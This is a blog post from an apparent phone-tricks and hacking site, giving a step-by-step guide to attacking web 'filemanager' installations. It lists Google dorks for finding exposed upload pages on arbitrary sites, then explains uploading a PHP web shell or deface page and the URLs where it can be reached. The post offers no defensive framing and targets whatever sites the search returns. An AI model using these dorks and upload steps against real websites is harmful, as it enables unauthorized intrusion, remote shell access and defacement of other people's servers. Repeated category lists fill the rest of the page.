"File Manager" ~ remote shell and deface upload vulnerability

Posted on by Unknown

"File Manager" ~ remote shell and deface upload vulnerability
zac+efron+2012.jpg (750×243)
Dorks : 
inurl:/filemanager/userfiles/ filetype:pdf
inurl:/filemanager/index.html
Exploit : 
http://www.site.com/filemanager/index.html
Lets Start !
open google or bing and type dork inurl:/filemanager/userfiles/ filetype:pdf or 
inurl:/filemanager/index.html 
now select any website from search results 
after clicking on website url will be 
http://www.site.com/filemanager/UserFiles/File/xyz/abc.pdf
Now Delete keywords after filemanager
for example : 
Beforehttp://www.site.com/filemanager/UserFiles/File/xyz/abc.pdf
After http://www.site.com/filemanager/
Now find upload option there and upload your shell or deface Page there
you file will upload in userfiles directory 
To View your upload shell or file goto 
http://www.site.com/UserFiles/Shell.php
http://www.site.com/UserFiles/deface.html
or 
http://www.site.com/UserFiles/directory/Shell.php
http://www.site.com/UserFiles/directory/deface.html

This entry was posted in

    Category

    • Aircel Trick
    • Airtel Trick
    • Android
    • Android Premium
    • Antivirus
    • Bsnl Trick
    • Crack / Serial
    • Docomo Trick
    • FREE INTERNET
    • Free Recharge
    • HACK
    • Idea Trick
    • LIVE
    • MOVIE
    • NEWS
    • Other
    • PC Games
    • Premimum Account
    • Premium Android Software
    • Premium Proxy
    • Reliance Trick
    • Reviews
    • Soft
    • Softwear
    • Tech News
    • TIPS
    • Tutorial
    • Ultoo
    • Vodafone Trick
    • Vpn tricks

    Category

    • Aircel Trick
    • Airtel Trick
    • Android
    • Android Premium
    • Antivirus
    • Bsnl Trick
    • Crack / Serial
    • Docomo Trick
    • FREE INTERNET
    • Free Recharge
    • HACK
    • Idea Trick
    • LIVE
    • MOVIE
    • NEWS
    • Other
    • PC Games
    • Premimum Account
    • Premium Android Software
    • Premium Proxy
    • Reliance Trick
    • Reviews
    • Soft
    • Softwear
    • Tech News
    • TIPS
    • Tutorial
    • Ultoo
    • Vodafone Trick
    • Vpn tricks

    Category

    • Aircel Trick
    • Airtel Trick
    • Android
    • Android Premium
    • Antivirus
    • Bsnl Trick
    • Crack / Serial
    • Docomo Trick
    • FREE INTERNET
    • Free Recharge
    • HACK
    • Idea Trick
    • LIVE
    • MOVIE
    • NEWS
    • Other
    • PC Games
    • Premimum Account
    • Premium Android Software
    • Premium Proxy
    • Reliance Trick
    • Reviews
    • Soft
    • Softwear
    • Tech News
    • TIPS
    • Tutorial
    • Ultoo
    • Vodafone Trick
    • Vpn tricks

Bloggerized by Best Theme & ThemesHive & Thanks to Top WP Themes